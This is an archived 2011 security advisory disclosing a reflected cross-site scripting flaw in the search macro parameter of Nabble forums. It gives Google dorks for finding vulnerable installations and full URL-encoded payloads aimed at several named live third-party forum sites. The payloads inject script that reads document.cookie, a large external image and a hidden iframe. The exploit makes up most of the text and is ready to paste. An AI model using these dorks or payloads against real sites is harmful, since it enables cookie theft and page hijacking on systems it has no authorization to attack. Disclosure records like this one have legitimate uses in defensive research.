Nabble Forums Cross Site Scripting

🗓️ 14 Oct 2011 00:00:00Reported by SonyType
packetstorm🔗 packetstormsecurity.com👁 19 Views
Nabble Forums Cross Site Scripting vulnerability in template/NamlServlet.jtp allowing malicious script injection
`# Date: 13.10.2011  
# Author: Sony  
# Software Link: http://www.nabble.com/  
# Google Dorks: inurl:NamlServlet.jtp or inurl:/template/NamlServlet.jtp?macro=3D  
# Browser: Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2011/10/nabble-forums-cross-site-scripting.html  
..................................................................  
  
Well..  
We can see error on the page..  
  
http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=3Dsearch_pa=  
ge%20&node=3D5394489&query=3Dxmlbeans  
  
Our XSS is here:  
  
template/NamlServlet.jtp?macro=3Dsearch_page[XSS]%20&node=3D5394489&query=  
=3Dxmlbeans  
  
After:  
  
http://dwr.2114559.n2.nabble.com/template/NamlServlet.jtp?macro=3Dsearch_pa=  
ge%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscri=  
pt%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%=  
29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3C=  
img%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22he=  
ight:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.=  
com/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C=  
/div%3E&node=3D5394489&query=3Dxmlbeans  
  
Some Demo with Google Dorks:  
  
http://forum.nyskiblog.com/template/NamlServlet.jtp?macro=3Dsearch_page%20%=  
22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Ea=  
lert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/=  
script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20=  
src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22height:%=  
20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.com/wa=  
tch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/div%3=  
E&node=3D5394489&query=3Dxmlbeans  
  
http://discuss.supergenpass.com/template/NamlServlet.jtp?macro=3Dsearch_pag=  
e%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscrip=  
t%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%2=  
9%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Ci=  
mg%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22hei=  
ght:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.c=  
om/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/=  
div%3E&node=3D5394489&query=3Dxmlbeans  
  
http://www.pcl-users.org/template/NamlServlet.jtp?macro=3Dsearch_page%20%22=  
%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cscript%3Eale=  
rt%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony%22%29%3C/sc=  
ript%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3E%3Cimg%20sr=  
c=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%22height:%20=  
800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.youtube.com/watc=  
h?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3E%3C/div%3E&=  
node=3D5394489&query=3Dxmlbeans  
  
http://nabble.documentfoundation.org/template/NamlServlet.jtp?macro=3Dsearc=  
h_page%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C=  
script%3Ealert%28%22TEST%22%29%3C/script%3E%3Cscript%3Ealert%28%22by%20Sony=  
%22%29%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3=  
E%3Cimg%20src=3D%22http://top10best.ucoz.ru/Cats1/cat1_1.jpg%22%20style=3D%=  
22height:%20800px;%20width:%20950px;%22%3Ciframe%20src%20=3Dhttp://www.yout=  
ube.com/watch?v=3DTCUaQzw707M%22%20width=3D%220%22%20height=3D%220%22%20\%3=  
E%3C/div%3E&node=3D5394489&query=3Dxmlbeans  
`
14 Oct 2011 00:00Current
0.1Low risk
Vulners AI Score0.1